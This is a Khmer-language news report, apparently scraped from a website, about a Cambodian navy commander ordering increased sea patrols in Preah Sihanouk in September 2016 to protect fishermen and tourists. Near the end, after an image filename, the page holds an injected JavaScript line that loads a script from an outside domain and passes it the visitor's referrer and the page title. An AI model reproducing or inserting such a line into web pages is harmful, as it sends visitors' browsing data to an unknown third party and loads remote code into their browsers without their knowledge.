ឯកឧត្តម ឧត្តមនាវីឯក ទៀ សុខា បញ្ជាអោយកម្លាំងបង្កើនការចេញល្បាត ការពារសុវត្ថិភាពជូនប្រជាពលរដ្ឋ

ព្រះសីហនុ៖ ព្រឹកថ្ងៃទី០៨ ខែកញ្ញា ឆ្នាំ២០១៦ ក្រោមការបញ្ជាផ្ទាល់ពី ឯកឧត្តម ឧត្តមនាវីឯក ទៀ សុខា មេបញ្ជាការរងកងទ័ពជើងទឹក និងជាមេបញ្ជាការទីបញ្ជាការជួរមុខ អគ្គលេខាធិការដ្ឋាន នៃគណៈកម្មាធិការជាតិសន្តិសុខលម្ហសមុទ្រ កម្លាំងអូប័រទីបញ្ជាការជួរមុខចំនួន១២រូប និងអូប័រល្បឿនលឿនចំនួន០២គ្រឿង ដឹកនាំដោយលោក វរនាវីទោ សុខ រស្មី មេបញ្ជាការរងកងនាវាអន្តរាគមន៍ ទីបញ្ជាការជួរមុខ បានចេញល្បាតនៅតាមបណ្តាគោលដៅដែលឈរជើង និងតាមតំបន់ឆ្នេរ ដើម្បីត្រៀមជួយសង្រ្គោះដល់បងប្អូនប្រជាពលរដ្ឋ អ្នកនេសាទ ភ្ញៀវទេសចរណ៍ជាតិ-អន្តរជាតិ ដែលមកកំសាន្ត ក្នុងខេត្តព្រះសីហនុ ព្រមទាំងបានណែនាំដល់បងប្អូនក្រុមម៉ូតូទឹក និងទូកដឹកអ្នកដំណើរទេសចរណ៍អោយបង្កើននូវការប្រុងប្រយ័ត្នខ្ពស់ និងប្រាប់ឲ្យយកចិត្តទុក្ខដាក់ពាក់អាវពោងសុវត្ថិភាពគ្រប់ៗគ្នាផងដែរ ។
-ទំនាក់ទំនងព័ត៌មានលើផ្ទៃសមុទ្រ ទូរស័ព្ទលេខ: ០៨៧ ៤៦ ៥៥៥៥ / ០៨៨ ៥៦៧៨ ៥១៥.សូមអរគុណ!

14264158_333323740345557_6000795601671891581_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More